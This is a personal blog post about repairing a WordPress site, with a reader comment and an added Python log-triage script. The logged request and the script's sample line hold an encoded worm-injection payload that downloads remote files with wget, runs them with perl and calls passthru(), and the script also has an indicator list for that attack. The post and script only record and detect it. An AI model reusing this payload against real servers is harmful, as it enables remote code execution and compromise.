Stuff be Fixed

Most of the errors have been fixed. They were caused by a slight change to the structure of WP files and how I had used includes to pull the various page parts around content. So I’ve reverted all the pages back so no includes are used, and most of it should work for now. Tomorrow – maybe – I’ll stare a lot at the backups and the current stuff and see what’s what – and hell I may even post any solutions :p

Checking error logs – due to the above – and I’m seeing that my site traffic has rocketed. I’m used to about 100meg/day. It’s now 4 full days into the year and it’s running at 175meg/day. That’s a HUGE increase, and it’s not real traffic, it’s bots stealing bandwidth.

Logs show lines like this:
[client 64.191.29.200] client denied by server configuration: /home/--path--/agm/200312.html&rush=echo _START_; cd

.75.177.60 - - [04/Jan/2005:21:32:21 +0000] "GET stats/agm/
200312.html&rush=%65%63%68%6F%20%5F%53%54%41%52
%54%5F%3B%20cd%20/tmp;wget%20%0Aatlasol.com/.zk/sess
_189f0f0889555397a4de5485dd611111;wget%20atlasol.com/.zk
/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_
189f0f0889555397a4de5485dd611112;rm%20sess_189f0f08895
55397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a
4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485
dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&h
ighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%
54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%
73%68%5D%29.%2527'; HTTP/1.1" 403 - "-" "LWP::Simple/5.800"i-

I do have some bandwidth protection inside WP, but that doesn’t help any static pages I’ve got. And no, I haven’t a clue what that stuff is, means or whatever. I do know I keep backups though. IP banning – I feel the urge…. (And every single night, without fail, at midnight UK time I have around 10 minutes of constant connection errors).

Personal Note: Tomorrow I go purple. Ever so slightly.

5 thoughts on “Stuff be Fixed”

  1. That “stuff” is an escape-coded redirect attempt. If you translate all the gibberish to the HTML equivalent, you’ll get a URL to a site to download all sorts of nastiness onto your site server. The bot is attempting to trick your site server into downloading and executing worm files. It’s way early in the morning for me to be sure, but it sure looks like a new-gen Santy to me.

    Block by user-agent, anything starting with “LWP” or “lwp” and that will stop the bandwidth thrashing.

Comments are closed.
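
Added example, not part of the original post or its comments: a short Python triage of access-log lines in the spirit of the comment above, percent-decoding the request until it stops changing (the %2527 in the logged request is a doubly encoded quote) and checking the user agent for an LWP prefix. The sample lines, IP addresses, placeholder host and indicator list are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format; the request target may itself contain quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

# Assumed indicator list, taken from the commands visible in the post's log line.
INDICATORS = {
    "passthru": re.compile(r"passthru\s*\(", re.I),
    "wget": re.compile(r"\bwget\s", re.I),
    "perl": re.compile(r"\bperl\s", re.I),
}

def full_unquote(text, max_rounds=5):
    """Percent-decode until stable, so double encoding (%2527 -> %27 -> ') is undone."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def triage(line):
    """Return a verdict dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    decoded = full_unquote(m["target"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    lwp = m["agent"].lower().startswith("lwp")
    return {"ip": m["ip"], "status": int(m["status"]), "lwp_agent": lwp,
            "hits": hits, "flagged": lwp or bool(hits), "decoded": decoded}

# Constructed sample lines (documentation IPs, placeholder host), modelled on the post's log.
SAMPLE = [
    '192.0.2.10 - - [04/Jan/2005:21:32:21 +0000] "GET /stats/agm/200312.html'
    '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20example.invalid/a;perl%20a'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F'
    '%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 403 - "-" "LWP::Simple/5.800"',
    '198.51.100.7 - - [04/Jan/2005:21:40:02 +0000] "GET /stats/agm/200312.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(triage(entry))
```

A 403 on a flagged line means the server already refused that request; the decoded text is still useful for seeing what the bot was probing for.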